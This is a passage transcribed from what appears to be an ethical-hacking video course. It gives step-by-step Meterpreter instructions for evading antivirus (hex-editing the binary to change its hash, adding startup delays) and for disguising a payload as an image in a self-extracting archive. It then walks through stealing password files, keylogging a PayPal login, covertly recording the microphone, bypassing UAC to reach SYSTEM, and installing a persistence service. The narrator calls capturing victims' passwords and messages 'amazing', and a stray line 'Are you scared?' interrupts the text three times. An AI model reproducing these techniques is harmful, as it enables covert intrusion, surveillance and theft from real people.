commands that we want. If I type, for example, ps command, this will list all of the processes running on that target machine. So if I scroll all the way up, we should be able to find the ratbackdoor.exe file that we executed on the target machine. It should be somewhere here. And here it is. Here is the ratbackdoor.exe. This is our file running on the target system. Now we know how to create payloads. Now, there are other tools as well that we can use, but I will leave that for you to discover, since they all work pretty much the same. Great. In the next video, we're going to check out how we can make some changes on our payloads that will allow us to either bypass some of the antiviruses, or we're going to see what we can do to the payload to make our target have greater chance of executing it. See you in the next video. Welcome back. In this video, I want to talk about bypassing antivirus. And this video is not going to be that practical. You might be asking, why? Well, I could show you a way to bypass antivirus right here in this video, but chances are that will not work once you watch the video in a month or 2 months or in a year. A fully undetectable payload is not something that lasts forever, especially when I show it inside of something like a course that many people are going to watch. So instead, I would like to tell you about a few different techniques that you can apply to generate an undetectable payload. So how it all goes? Well, many people start using a payload, and sooner or later antiviruses start detecting it as a malicious program. That could be due to people using it a lot, or it could be that some of you uploaded it to the VirusTotal and it got sent to all the antivirus vendors. However, let me talk about the rules that you can apply to bypass antivirus. Now, the best thing that you can do to create a fully undetectable payload is to code your own programs or your own payloads. For example, I coded a backdoor in C language, and when I scanned it, it was fully undetectable. No antivirus was able to flag it as a malicious program. Then I created a course on creating that backdoor, and soon enough, that backdoor was no longer fully undetectable and was getting caught by most antiviruses. It was FUD at first because it was a new payload with a new code or a new source code. Once you have a unique and different code and you compile it, that code becomes a different binary which makes it undetectable until many people start using it. So just remember, best way to create an undetectable payload is to code it yourself in a unique way. However, this requires you to know a programming language, and for many, this will present a problem. There are other ways as well, so one of them is to update your payload tools if possible, and you also want to keep an eye for the tools that are new, or the tools that just came out. Why? Well, they might have different payloads that aren't widely used yet, so that is another way that you can do it. You can also try creating different types of payloads, try out PowerShell payloads, Python payloads, C# payloads. All of them have higher chances of not getting detected. Another cool thing you can do once you generate your payload is to change its binary a little bit. Let me show you what I mean. We can do this by using Hex Editor. So let us just real quick generate a normal Windows Meterpreter reverse TCP payload. Let us go with lhost, lport, and let's specify file to be exe and output to be shell.exe. Okay, great. This is a regular Meterpreter payload. It gets detected by almost every antivirus in the world. It is, matter of fact, the most known payload in the world for malicious activities. But what you can do, if I show you right here the MD5 sum hash of this payload, you will see it is this one. So some antiviruses work by getting the hash of the executable and storing it in their database. Then once you change this hash, and you change this hash by changing the binary of the program, this hash becomes different and it is no longer inside of the databases of antiviruses. Let me show you a simple way to change it. So what we can do is we can type Hex Editor, which is a tool that is already installed in Kali Linux, and we can specify the payload name. This will open the payload's binary. And here we want to change some of the binary. Just be careful, don't change something that you don't know what it is, because even changing a single byte right here could result in a program not working, if that byte was essential for the program to run. Now, there are a few things right here that we can change for sure, and that is this right here. This is a program that cannot be run in DOS mode. Now, what is this? Well, this is a string. It is nothing really too important for the program. So we can go navigate with our arrows, and we can change this string. As you can see, when I type hexadecimal right here, it changes the output inside of this right column. So if I just type some random hexadecimal numbers and letters to change this, and once you change some of it, this will change colors, And if I go all the way down, there is another thing that we can change, and that is this text right here. This is also something that we can change. Just make sure you navigate to the correct line. In my case, I believe it is this one. The text should start with 7.4, and we can change it to whatever we want. Just once again, make sure you don't go over that word, because changing, for example, this byte right here will result in a program to not work. Okay. Once you finish this, you can Ctrl-O, save this. Now if you remember how the MD5 hash started before we did this, if I do it again, it is completely different. I believe it started with something like 8.3 or I don't even remember, but right now it is completely different. We managed to change the hash of this executable by changing its binary. And this, even though for many antiviruses this is something that will not bypass them, even if you manage to bypass 2 or 3 additional antiviruses, that is good. You did a slight change. So this won't do much of a difference, but everything you can change, you should, since you gain higher chances of bypassing antivirus. As well as if you have, for example, the source code of a payload, what you can do is you can try to change it yourself a little bit. Just add some random functions, or make your program not do anything for first minute or two after running. All of these things can help you bypass antivirus. Okay, so these are just some of the ways that you can apply next time you create a payload. Just remember one thing. Whatever type of payload you create to be undetectable, it won't last long. So this is something you will have to experiment with over and over again. In the next video, we're going to see one of the ways we can mask our payload to look like a different program. See you there. Welcome back. In this video, I want to show you a cool way that you can make your executable seem and look like another file. So what I'm going to do right now is I'm going to mask our shell.exe that we created from the previous video to look like a car image. And what you will need for this is you're going to need a car image, or basically it doesn't even have to be an image or a car, it can be any file type that you want. If you want to create it to be a PDF file, you can. If you want to create it to be a JPEG file, you can. Just follow along, and the process of doing that is the same for every file type. So, two things you're going to need. A file that you want your executable to look like, and the executable itself. So, this is the same payload from the previous video, which is a regular Windows Meterpreter shell. And what I'm going to do is I'm going to copy it to the desktop real quick. And once you got these two files on your desktop, you are ready to go. Now, the first thing that we must do is we must make an icon file from this PNG file. And how can we do that? Well, we can just open the Google Chrome or any search engine and type PNG to ICO. You can navigate to the first link in case you chose a PNG file, and it will lead you to this convertico.com, where it allows us to simply just upload our PNG image and it will create an icon file with that image. So I'm going to lower the screen. Then, as it says right here, drop your PNG files. I will drop it right here. It will take a few seconds, and right here our file should appear once it's done. Here it is. We can download it by pressing this arrow, and it will download the car.ico file for us. So I'm going to show it in folder, paste it on my desktop, and now we're good to go. We got the car.png, which is the image. We got this car.ico, which we're going to use to make our executable have this icon right here. And we're going to merge it with this PNG image in order for once the target executes our program, it also opens this image. Let me show you how it would look like. So all you want to do, you want to select these two files, right click on them and click Add to Archive. Click on this. Right here there are a few settings that we must set. First, archive format should be zip. Right here you want to check Create SFX Archive. And here you can name your file whatever you want. The only bad thing about this is that it will have an exe extension. But most of the people don't have extensions enabled on their Windows system, so this will not present that big of a problem. Okay, so let's go right here and call it car.exe. Then I want to go to the Advanced tab and click right here on SFX Options. This will open this small window, and we want to go through each tab and set the settings accordingly. In the Update tab, you want to click Extract and Update Files, and in the Overwrite mode, you want to overwrite all files. Then if I go to Text and Icon tab, here we want to click on this Load SFX icon from the file, click on Browse, find the ICO file that you just created. In my case it is on my desktop, so I'm going to select it. Once you do that, you can move on to the next tab. So in the License tab there is nothing that we want to set. Here also there is nothing that we want to set. If I go to the Advanced, nothing. In Modes, we want to click on Hide All and unpack to a temporary folder. After it, in the setup, we want to write both of our file names. So in the Run After Extraction, we want to type right here shell.exe. Just make sure you type the file's name right here correctly. So shell.exe is our executable and car.png is our image. Okay, good. Under the General, nothing here to do. So once you set all of those options, you can click on OK, and you can click right here on OK as well. And here it is. We got car.exe on our desktop. It has the icon of this image, and once we go and execute it, it should also open this image. But in the background, it should also run our shell.exe. Let's test it out. But first, we must set up our listener. So open Terminal, run MSF console. Let's set up our listener, so multi-handler, set payload to be regular Windows Meterpreter reverse TCP. lhost will be the IP address of my Cal Linux machine, and lport, if I remember correctly, was 5555. Now I can run this. This will start the listener, and if I go to my desktop and execute this file, well, for some reason, it seems to have only opened this Meterpreter shell, and it didn't open the car image, and this is something that happens sometimes. So we can try to change some of the settings in order to make this work, but in this case, it was just a late opening. So here is the image, it opened right now. For some reason that took a few seconds, so let's just run it once again, just to see whether it will open faster right now. So I will run the listener once again and open car.exe. It still seems to take some time, even though our Meterpreter shell is open. So what we can do instead of this is we can first of all exit this shell, close this image that opened 10 seconds after we executed, and we can start the MSF console again, delete this file, and we're going to change one setting which will hopefully make our file execute faster. So let's go once again, zip. Here we want to name the file to be car.exe. Under the Advanced, SFX Options, and here under the Setup is something that we want to change. So last time we specified the shell.exe first, right now we're going to specify car.png first. And under it I'm going to specify shell.exe. Then I'm going to click right here, hide all. In the General, nothing. In the Update, Extract and Update Files, overwrite all files, text and icon. Let's select our icon file. In the License and Module there is nothing, so let's just click on OK. It will create our file once again. Not sure why I closed MSF console when right now we are going to set up our listener again in multi-handler, Meterpreter, set lhost, and the lport. We want to run it, run the file, and now it opens the image straight away. Okay, so just make sure that you specify the image name first, and then after it you can specify the shell name. And here we also got the Meterpreter session open. We can execute commands as usual, so our program works good. It has an icon of an image, it also opens an image. The only problem is this exe extension. And there are some of the ways that you can fix this and make it seem like it doesn't have an exe extension, but most of those ways automatically get detected by any antivirus out there. Okay, great. Now that we covered this, we are ready to finally get into the post-exploitation section. And here we're going to go into details with the Meterpreter shell what options it has, and what post-exploitation modules we can run after hacking the target. See you in the next video. And welcome back. Time to touch on a subject of post-exploitation. We have traveled a long way from the beginning. We covered information gathering, where we tried to get as much information about our target that we would find useful for a future attack. After it, we scanned our target from technical aspect and we discovered its open ports and softwares that it runs. We then used different tools to figure out whether that target has any known vulnerability that we might be able to exploit. And then we exploited many different targets from Linux Metasploitable to Windows 7 and Windows 10. We both saw how to exploit its vulnerabilities, and then after it, we created our own payloads that we executed on the target system. Now comes the part after the exploitation. What are we going to do now that we're on the target system? What are we looking for, and what cool things can we even do? Well, we have lots and lots of options, depending on what we want to find, of course. For example, the most simple thing we can do is scroll through their file system and look through what files and programs they have on their machine. Maybe we could find something interesting, such as saved passwords inside of a file, or some other important files for that company that are laying on that machine unprotected. We could also download files from that machine and also upload files to it in case we want to send another payload or another executable that we want to run on their system. We can do all of this with our Meterpreter shell just by running a few commands. Talking about passwords, that is also something that we would look for. We could try to extract saved passwords from browsers, for example. Remember when you click on that button that says "Remember me" once you log into some web page? Well, those passwords could be stored somewhere on their machine. And why would we go for passwords? You might be asking. Well, getting targets' online accounts just expands our access to them. Imagine you were to get their PayPal password and gain access to their PayPal account. That wouldn't be so pretty for them, since you would have access to all of their funds. Another thing we could try to do is gain access to the entire network from the target machine that we hacked. Maybe inside of company's network you manage to get access to one machine, but it doesn't have all the things you might need. Maybe some important files could be on some other machine from that same network. In that case, you would want to try to hack that other machine from the machine that you already hacked. Now, you might be wondering, well, why not from our Cal Linux machine? Well, maybe machines that belong to that network have more trust between one another. Maybe they exchange files or communicate with some other software altogether on that same network. In that sense, it would be easier to get access to one of those machines from a system that is already inside of their network, right? Maybe we would also want to run a keylogger on the machine we got access to. Now, keylogger is a program that captures every keyboard input from that machine. So with this, not only we could maybe capture some passwords that the user of that machine would input in some secured website or software, but we would also be able to see everything else that he or she typed. From what they searched on the internet to maybe the messages that they are sending on social media from that machine, or basically anything that they type in the keyboard, we will be able to see it. Amazing, right? You can picture post-exploitation as some type of a information gathering on the target system. And these things that we talked about are just a small portion of what we can do once we hack a machine. Now that we briefly talked about post-exploitation theory, let us see what available tools and commands we can use to achieve all of the things that we mentioned and even more. See you in the next video. Time to finally figure out our possibilities with the Meterpreter shell. In the last section, we focused so much on how to gain access in many different ways, and we popped a Meterpreter shell so many times. But we never got to see its true power and all of its commands. We only ran a few of them just to make sure the connection was successful. Now, we're going to go real quick through the basic commands that we can do with the Meterpreter shell, and then after it, we will see some of the post-exploitation modules and how we can run them. So for this, I already got the shell opened, as we can see right here, Meterpreter session 1 opened. I ran my file, which is shell.exe, and by now all of us should know how to do this. Just send the payload to the target, execute it, and you should have a Meterpreter session on their machine. From here, we can run the help command to see all of the available commands with the Meterpreter shell. If I scroll all the way up, and we are going to start from the beginning, the first section of the commands that we get are called core commands. And these commands we are going to brush through real quick. We're just going to mention a few of them that we already know, such as for example this background or BG. If you type background in your Meterpreter shell, this will background your session, and you will be able to use your Metasploit Framework module. When is this command useful? Well, if I type the command sessions that we already know, we got one session currently, but you might have a session with multiple targets. And in order to navigate between each and every session, you can use the background command to put this Meterpreter session in the background and, for example, enter a different session with a different machine. So that command is useful in that sense. Of course, you don't need to type the background command, you can simply just type instead BG, and it will do the same thing. So if you go back to my session and go back to my help command, we can scroll back to the core commands and read some of them and what do they do. So just go to this menu, and most of them we're going to cover later on. From now on, we're not going to touch them, because most of these are not needed for us at the moment. For example, you know that you can exit the Meterpreter shell with this exit command, background the shell with background command. Here we can see how we can switch between different sessions, and you can get the user ID. I believe get UID command is right here. Here it is, get UID, get the session UID. So if I type that right here, it will tell me the session UID. We also know the command get user ID, and this will tell us which user are we on the target machine. Okay, so these are just some of the core commands, and of course you can experiment with others, but some of them we're going to cover later on. For now on, you can just read through this menu and go to the file system commands. And these file system commands, you can just picture them as commands that we use inside of a terminal. So we can change directories, we can print current working directories, list all of the files on the target system, and let's see how that would work. So if I go down here, and to see in which directory I am, I can type the command print working directory. It will tell me that I am currently in the /desktop directory on the target machine. Now why am I here? Well, because the shell.exe inside of that directory, and once the target executed it, our Meterpreter session will automatically be inside of the directory where the payload is. Okay? If I wanted to list all of the files inside of here, I can type the dir command, and I can also type the ls command. So it supports both Linux command and Windows command. Dir is used to list files inside of a Windows system. So we can see what files we have right here, and maybe we could find something interesting right here. For example, we get this passwords.txt file. And of course I created this on purpose just for this tutorial, but this is something that occurs quite often. Matter of fact, years ago, even I had this file where I've written down all of the passwords that I couldn't remember for different websites. And to read the content of this passwords.txt file, we can use a familiar command for us, which is the cat command. So if I type cat passwords.txt, press enter, this will print out all of the content inside of this file. We can see the router, username and password, the Facebook username and password, and the PayPal email and password. So this is something that you could possibly run on. And you want to see the contents, just type the cat command. Of course, we don't need to be inside of this directory if we don't want to. We can use our regular cd command to go one directory back, and if we type pwd, we're no longer in the /desktop directory. Here we can type dir once again to list out all of the files inside of this directory. If we wanted to choose one of these directories, we can go back to them, but for now on, let's just go back to the desktop directory. Great, if I type dir, here are our desktop files, and if we wanted to, we could also download a file from the target machine. So how can we do that? Well, it is as simple as just typing download and then the file name. In this case, let us say we want to download, for example, passwords.txt. I press enter, and here it is. It will download it for us. Now, I'm not sure where by default the Meterpreter saves these files, but it could be right here on the desktop, and here it is. Here is the passwords.txt. And you can also upload files if you want to. For example, let's say we want to upload this ratbackdoor.txt from one of the previous videos to the target machine. We can see right now we don't have it on the desktop, on the target machine, but if I type upload and then ratbackdoor.txt, press enter, go back to the desktop just to check out, and here is our file. We successfully uploaded another executable to the target system. Then we could use something like a shell to execute that file. Okay, but we're not going to do that right now. Let us exit out of the shell and run the help command once again just to see what else we can do. Inside of the file system commands, we also get the commands on how we can create and remove files. So we can use rmdir to remove a folder, we can use rm to delete the specified file. So for example, we want to delete a file on their desktop, we can do that using the regular rm command. We can also create a directory and create files if we want to. So let's see, for example, if we manage to delete the rat backdoor that we just uploaded. We don't want it there, so let us just delete it real quick. Run the rm command and it is no longer here. And let's say we want to create the test directory and we want to copy passwords.txt in the test directory. Access is denied. Let us just check out right here. We got the test directory, but for some reason we can't seem to copy this file. And this could be due to many different reasons. But the main reason will probably be because we are not an administrator on the target machine. And we're going to check out in some future video how we can become an administrator and system level account just by getting the Meterpreter shell as a regular user. Remember, if I run the getuid, we're just a regular user. We are not the system level account. But more about that later on. For now on, let us run the help command once again. And you can play with these file system commands that we have right here, but they are just regular commands that we can run inside of a Kali Linux terminal. Just this time you're running it on the target machine. Inside of the networking commands, we only have a few of them, so let's just test 2 or 3 of them. For example, this arp command will display the host arp cache. So with this, we should be able to see the IP addresses and their corresponding MAC addresses. These are all of the IP addresses that are inside of our ARP tables on the Windows machine. So we have our Kali Linux IP address because we are currently communicating with our target machine from our Kali Linux IP address, therefore it must have our Kali Linux IP address in the ARP tables. We also get the router's IP address, the broadcast IP address, and all of these down here are not that important. If I run the ifconfig command, of course I will be able to see all of the networking interfaces on the target system, as well as the IP address that the target currently has. If I run the command, for example, netstat, this will print out all of the connections that our target machine currently has. So we can see right here the connections, the IP addresses, which protocol are they using in case these are using TCP, and down here we have UDP protocol. If I go up here, we should be able to find our shell.exe that established a connection with the Kali Linux IP address. So we know that 192.168.1.4 is the IP address of my Windows 10 target machine. And here, if I go and find the IP address of Kali Linux machine, and here it is, we can see it is running on port 5555. The connection is established, and the process that is causing this connection is shell.exe or our payload. Great. Now, if you want to, you can go up here and experiment with the other commands as well. but these are not that interesting or important for us at the moment. What is important and what we will cover in the next video are these system commands and user interface commands. We want to see some of the cool stuff such as capturing keystrokes or running a keylogger, running a screenshot on the target desktop, maybe for example recording microphone, recording webcam, all of that we want to check out and see how we can run them. And we will do that in the next video. So experiment with the commands that we covered a little bit. Feel free to run the others as well if you want to check out what do they do. And I will see you in the next lecture. Let's continue with our meterpreter commands. So we only covered navigating through file system and some essential commands between switching sessions inside of a meterpreter, but we didn't really touch on those interesting commands such as running keylogger or snapping a screenshot or recording microphone. But before we get to them, there is one portion of the commands that we must go through first, and those are system commands. Let us run the help menu to check them out. So if I scroll all the way up, right after the networking commands, we should see the system commands. And here there are a few interesting ones. For example, let's start with this execute command right here. So this command allows us to execute any type of the command that we would use inside of a shell. It will most likely run this on a separate thread, so we will be able to execute different commands simultaneously. Let me show you what I mean. So for example, let's say that I want to start a calculator on the target machine. I can type execute calc, and here it will tell me that I need to specify the -F option. Process 9096 is created, and right here I got my calculator opened. Now if I wanted to terminate this process or any other process, inside of the system commands we also get this kill command that says terminate a process. But for this command we need to know the process ID. So here we got the process ID as soon as we started this process, but let's say we wanted to terminate a different process. How would we get its process ID? Well, remember, we can type the command ps to list out all of the files that are currently running on the target system. And this left column right here is the process ID. If I scroll all the way up, here we can see PID or process ID. And I can scroll all the way down, and at the end, somewhere around here, we should see our calculator being open. Let's go and search it. So search for the calculator application, and if I scroll a little bit up, we should be able to find it somewhere around here. And here it is, calculator.exe. So we can see the process ID is 8412. Let's try to kill this process and see whether our calculator closes. So if I go and copy this process ID, 8412, and down here I type kill, and then paste the process ID, here we can see the calculator is now gone. So we can start different programs and terminate different programs if we want to using a meterpreter shell. A few more interesting commands from the system commands would be probably this reboot command that reboots the remote computer. Now, I'm not going to test this because I'm running my shell on the main Windows 10 operating system, so rebooting that machine would be no good since I'm also recording on it. Besides rebooting, we can also shut down the target machine just by specifying the command shutdown, and you can test both of these commands on a virtual machine. And at the end we also get the system information, so gets information about the remote system such as OS. And that is always useful to know, some of the additional information about the target machine. Here we can see the computer, the OS, the architecture, the system language, and other options as well. But I said that we're going to cover some of the interesting commands right here in this video, and let's get straight into them. So after the system commands, we get these user interface commands. And here we can control mouse, keyboard, record microphones, run screenshots, and a bunch of other cool options that we're going to cover right now. So let's start, for example, with this mouse option. Send mouse events. let's see how that would work. If I just type mouse inside of the interpreter, it gives us a small usage for this command. So mouse and then the action, we can type click, up, down, right click, right up, right down, double click, and so on and so on. We can also move the mouse if we want to. So let's try this command. If I copy, mouse move, and then paste right here, let us put the mouse right here, and if I press enter,
Are you scared?
here the mouse moved on its own. Let's do it once again. Did you see it? It moves on its own, so we can control the mouse on the target machine. Now, even though this is cool, it is not really that useful. However, there are other commands that we would find a lot more useful than these, such as, for example, running a keylogger. Let's see how we can run a simple keylogger. So if I scroll all the way up, here we get the commands keyscan start, keyscan stop, and keyscan dump. Let's give them a try. If I copy this command that says start capturing keystrokes, input it inside of my interpreter, it says starting the keystroke sniffer. Now let's go to this page, and this is a PayPal page, and I'm just going to type something random right here. So let's say example@gmail.com, and password will be test1234. If I click on login, of course this account does not exist, but let's go right here and see whether our interpreter shell managed to capture it. To print out the keystrokes that were captured, we can type keyscan_dump. Press enter, and here it is, example shift@gmail.com, and here is the password, test1234. To stop a keylogger, we can type keyscan_stop, and this will stop capturing keystrokes. So this is really useful if you want to capture the messages that they're sending online, or basically whatever they type on their keyboard, you can capture it by typing keyscan_start, and then you can type keyscan_dump to dump all of the keystrokes that they captured in that specific time lapse. Great. Let's check out more options as well. So another interesting one is the one that we already covered, which is the screenshot option. As it says, grab a screenshot of the interactive desktop. If we run it real quick, this will save a screenshot inside of the /home/Mr. Hacker directory. And we can visit it by clicking on this, open folder, and here is the screenshot. So it is the screenshot of our Kali Linux machine, because my Kali Linux machine is running on this Windows 10 machine. But what if I wanted to, for example, see what the target is doing, or simply just record the screen at the live time? Well, there is a command called screen share, and it says watch the remote user's desktop in real time. We can type it right here, screen share, and this will start streaming the target's desktop to our Kali Linux machine. Here it is. Now, this command knows to be a little bit buggy, as it does require some of the power in order to run. As we can see right here, it can be buggy sometimes, but nonetheless we can see the target's desktop. Let us close this real quick, and another command that I wanted to show you that is really cool is recording the target's desktop. How we can do that? If I type the help command, go up here.
Are you scared?
Here we can see these commands right here. Record mic, record audio from the default microphone for X seconds. We can also stream the webcam and take a snapshot from the specified webcam using these commands right here. But since my Windows 10 machine doesn't have a webcam, I'm not going to be running this. Of course, you can test these commands out if you got a webcam and see if they work. For now on, I'm going to record microphone on our Windows 10 target machine. Now, this command requires a parameter. We can specify the amount of seconds using -d option, and I will specify 10 seconds. If I press here enter, this will start recording, and it should capture what I'm speaking at the moment to the microphone. So here the 10 seconds finished, and it saved the file inside of the /home/Mr. Hacker, and this is the file name. You can listen it if you want to, but for now on, let us check out what other commands we have at the end of the help menu, and we got these cool commands such as get system and #dump. And believe it or not, these commands could be the most useful out of all of the others that we covered. However, if I try to run the get system command inside of my interpreter shell, operation failed. They will not work. It seems we cannot get system privileges on the target machine. And just to remind you, system privileges are highest privileges on the Windows machine, even higher than the administrator. Once we get system level account, we can say we fully hacked that box. So what are we going to do? Well, we're going to try to elevate our privileges in the next video by using post-exploitation modules. For now, we covered basic Meterpreter commands, and you saw how useful they are despite being so easy to run. We simply got a screenshot by running one command, we recorded a microphone by running one command, but it is time to get into more advanced things and running more advanced modules. See you in the next video. Welcome back. Time to see how we can try to elevate our privileges on the target machine. But before we do that, I just want to play you this recording that we recorded from the previous video using Meterpreter and the record mic command, just to see that we indeed managed to record the sound on the target machine. So if I play it, this will start recording and it should capture what I'm speaking at the moment to the microphone. You can see it did manage to record it. Now, it is not that high quality of a sound, but nonetheless we can hear what the target spoke on the microphone. Nonetheless, let's get back to the privilege escalation, and privilege escalation is a big topic and a more advanced topic. There are many advanced techniques that can be used to try to elevate privileges. However, we're going to be covering the scripts we can use to automate those processes. All of those scripts we have available inside of our Metasploit framework. Now, usually we don't know whether we can elevate privileges or not. Throughout the years, there have been many exploits that got patched for the privilege escalation. However, maybe our target skipped some patch and is vulnerable to one of them. So what we're left is just to try all of those scripts out and see if some of them works. What we can do to search for the privilege escalation exploits is we can first background this session that we got with our Windows 10 machine, and we can type search bypass UAC. What does this mean? Well, UAC is user account control, and these exploits that we will find are used to bypass it, which could allow us to elevate our program privileges to the system level. Another thing I like to search is type search and then the year that we are currently in. Since we are at the end of 2020, we can type 2020 or search 2020. And this will list out all the modules that came out this year. Inside of these modules, we will have everything, so what we want to search and filter out is Windows exploits and preferably local Windows exploits, as we can see right here. What does local mean? It means it's getting executed on the system itself. Usually, these type of local exploits try to elevate privileges. For example, here we can see a few of them, such as exploit Windows local and then this name. Up here we got another local exploit, and many more are right here. And we can also see the SMB ghost exploit. Now, I know what you're thinking. I did say that Metasploit Framework doesn't have SMB ghost module. Well, that wasn't true. However, this module is a local exploit and it's only useful after you're already on the target machine. As we can see, it is exploit for Windows, but it is also a local exploit. The one that we covered is the same vulnerability inside the SMB version 3, just we exploited it remotely from another computer to gain a shell. But let's test it out, just to see whether we manage to elevate our privileges using this exploit. So, to use it, we can type use and paste the exploit. Just make sure that you got the active session with the target machine. As you can see right here, I got session 1 active on the user account of the Windows 10 machine. If I type show info for this exploit, we can read that this is a vulnerability that exists within the Microsoft Server Message Block 3.1.1 protocol that can be leveraged to execute code on a vulnerable server. So we can see the targets right here, and all we need to set is the session ID. To do that, we can type the sessions command, check out the session ID that we got, and type set session and then 1. If I type run to execute this local exploit, well, seems that it did something, but we didn't get a shell back. So we can assume it doesn't work. Let's try another one. If I type search 2020, and for example, let us say I'm going to use this one, which is exploit Windows local CVE 2020 service tracing. And the reason why I'm using this one is because down here it says privilege elevation vulnerability. So this can be used to elevate privileges in case our target machine is vulnerable. Let's check it out. Press enter, type show info just to check out what this module does. And this module leverages a trusted file override with the DLL hijacking vulnerability to gain system-level access on vulnerable Windows 10 64-bit targets. So our targets do match, and we do want to gain system-level access, so let us see whether this will work. There is only one thing that we must set, and that is required, and that option is the session. So let's type set session, and then 1, press enter, and run the exploit. Failed to validate lhost, so let us type show options just to see which payload we got, and we need to set lhost to be 192.168.1.12, which is the IP address of my Kali Linux machine. Now also make sure that the L port is different than the port that you got active inside of a session. Since I got port 5555 active in the current session, I can specify right here 4444. But if your Meterpreter session is running on port 4444, you need to specify a different local port, otherwise none of these exploits will work. So I can leave it on 4444 and type run. And it seems that this one doesn't work either. Let's try from the UAC bypass exploits. So I will type search bypass UAC, and here I will see all of the exploits for user account control bypass. Now, you can go ahead and try all of these local Windows bypass UAC exploits to see which ones work. Just make sure you read information about them first before running them. But what I'm going to use in this case is this FOD helper bypass UAC. It is from 2017 and it showed to work a lot of times in my personal experience. So I will copy the name, type use, and then I'll paste the name right here. Press enter. It configured the payload, and let's give it a try. If I type show information just to see what it does, it will tell me this module will bypass Windows 10 user account control by hijacking a special key in the registry under the current user hive and inserting a custom command that will get invoked when the Windows FOD-helper.exe application is launched. It will spawn a second shell that has the UAC flag turned off. So let's see what are our options that we must set. And we need to set the session, in my case it is session 1, and I can use the local port 4444, and if I type run, here it is, we got another session open. We got the Meterpreter opened, and this is a different session. As you can see, it is running on port 4444. So we got a shell back with this local exploit. But if I try to run the command get user ID, it will say that we're still the same account that we were before. But remember, it said in the module description that this exploit will spawn a second shell with the user account control flag turned off. What does this mean? Well, it means that if we try once again to run the command get system, that didn't work before, now we are the system account. We did it. Right now we can say we fully owned this Windows 10 target machine, since there is nothing that we can do on it right now. And just to prove to you, I will type get user ID once again, and it will tell me that I am authority system account. So feel free to test out other modules to see if they work or not, and you can also try these modules on our Windows 7 virtual machine just to see how that would go. Great. Now that we elevated our privileges, let us check out other post-exploitation modules that we can also run. See you in the next video. Welcome back. And in this video, I want to talk about something called persistence. And what is persistence? Well, persistence is a module that allows us to stay on the target machine even after the target machine gets rebooted. So it is essentially adding our payload to the startup folders where it will automatically get started as soon as the target system gets restarted. It is a part of maintaining access. So this is one of the things that we want to do as soon as we get on the target machine. So what I did right here is I established a Meterpreter session with the target machine. I used this module to bypass UAC and get system privileges on my Windows 10 virtual machine. And the reason why I'm testing this on a virtual machine is because in this video I will have to restart this machine to see whether the persistence is working. And how I transferred the shell.exe to the Windows 10? Well, I used a cool way of transferring it using the Apache 2 web server, and to do that you can simply just type system ctl and then start and then type Apache 2. This will ask you for your password, input it right here, and this will start the Apache 2 web server. Now what you can do is you can open up Internet Explorer on the target machine and type in the IP address of your Cal Linux, which will lead you to the web page of our Cal Linux machine. Now, you will not see this shell.exe right there. It is there because I put the payload inside of the web server directory. And to do that inside of your Cal Linux, after you create the payload, you can navigate to the /var, /www and /html directory, where you should have two files called index and then .something. You can delete those files and you can copy your payload to this HTML directory right here. Then if you go to your Windows 10 machine, refresh the page, you will have your shell.exe available to download on your Windows 10 machine. Just make sure that you disable the Windows Defender on your Windows 10 machine, because we are using a regular Meterpreter reverse TCP shell, and it gets detected by Windows Defender. So after you do all of that and establish the connection, you can then gain system privileges, and we already know how to do that. We simply just test a bunch of those modules that are used to bypass UAC, and then we become the system level account.
Are you scared?
Once you do all of that, it is time to run the persistence module. So how can we do that? Well, first of all, I will background this session, and if I type sessions, you can see I have two sessions available. The one is on the regular user account, and the one is that I elevated, which is this system level account. So what I want to do to run the persistence is I can type this search persistence inside of my Metasploit framework. This will output me with a bunch of different modules. And the one that we're going to cover in this video is going to be this one right here. Exploit, Windows, local, and then persistence service. If I copy the module name, go down here and type use, paste the module, press enter. It will set my payload to Windows Meterpreter reverse TCP, and if I type show info, here we can see that this module would generate and upload an executable to a remote host. Next, it will make a persistent service. It will create a new service which will start the payload whenever the service is running. Admin or system privilege is required for this module to run. That is why we created a second session with the system privileges. So what we need to specify right here, if I type show options, is we need to set the session, and here we're going to set the session with the system level account. In my case, I believe it is session 2. That is correct. And right here, we want to set our payload options. Of course, if you want to, you can set these other options as well, such as retry time. And retry time is simply just the time that shell will retry to connect to if the connection fails. 5 seconds is default. Now we can set that to be, for example, 10 seconds. It doesn't have to be 5, that would be too quick. And after we do all of that, we can run this module. Press run, and this will open the session 3. If I type get user ID, we will be the system level account, but what is special about this session is that it will automatically connect back to us even after the target machine is rebooted. So the target won't need to run this shell.exe after the system is restarted. It will automatically connect back to us again, because we ran this persistence module. Let me show you what I mean. if in my interpreter session I run the reboot command, press enter, this will start restarting the Windows 10 machine. All of the other sessions will die out because the connection has been closed. If I Ctrl-C this, exit out of this, type sessions, we will have no active sessions anymore. So what we can do right now is we can type use exploit multi-handler, set the correct payload, and inside of the show options we want to set the correct options that we used inside of our persistence module, and that is the port 4444 and the IP address of our Kali Linux machine. So all I need to do right now is type run, and here we get the session open because this machine hasn't yet shut down. So we're just going to close this because this is not the session that we wanted to. And I'm going to manually exit out of this machine and go and start it once again. Now that the machine is getting started up, I will run our listener, and if everything worked correctly, we should get a Meterpreter session opened as soon as the machine boots up, without the target having to do anything but start their machine. So let's see whether it will work. The machine is currently starting up, and let's give it a few seconds. And here it is. Our Meterpreter session 5 opened on its own. And notice that it didn't even log in to the user yet. And the best part about this is that if I type get user ID, I will already be system level account. So I don't have to go through the privilege escalation process again. This Meterpreter session opened without anyone clicking on anything, and that is the good part about persistence. Now, even if the target shut down this PC once again and started it in a week or two, our persistence will still work and our payload will automatically connect back to our Kali Linux machine, if the IP address of the Kali Linux machine hasn't changed, of course. One more thing to keep in mind is that sometimes persistence can be buggy, so it knows not to work sometimes. But in most cases it should work, and if it doesn't, there are other modules for persistence as well. If I type background and search persistence, I used this module right here. But you can see there are other modules as well. You can check them out if you want to, maybe they will work better, maybe they will suit your needs more, but whichever one you find to work, just use it and you will maintain access on the target system. Great, now that we covered persistence, in the next video, we're going to cover the usage of post-exploitation modules and a few more useful commands that we can do after exploiting the target. See you in the next video. Welcome back. And in this video, I want to talk about a few more useful commands and post-exploitation modules. So what I got right here, I established my Meterpreter session with my Windows 10 main machine. And now let's see what else could we find useful after exploiting the target. Well, if I type the help command, somewhere around here I believe there should be an option called search. And what search allows us to do is to, for example, search for specific file types on the target system. So if I type search -h, this will give me an options that I can use with this command. For example, if I wanted to find all the JPEG pictures on the target system, what I could do is I could type search -f and then $.jpg. Press enter, and what this is going to do is it will manage to extract all the JPEG images that are located on the target system. Now you can also do for any other file type that you want, and you can also mix it with one of these options right here. And here are the results. We can see there are a lot of them. All of these are JPEG files, as we can see right here. Now if we scroll all the way up, we 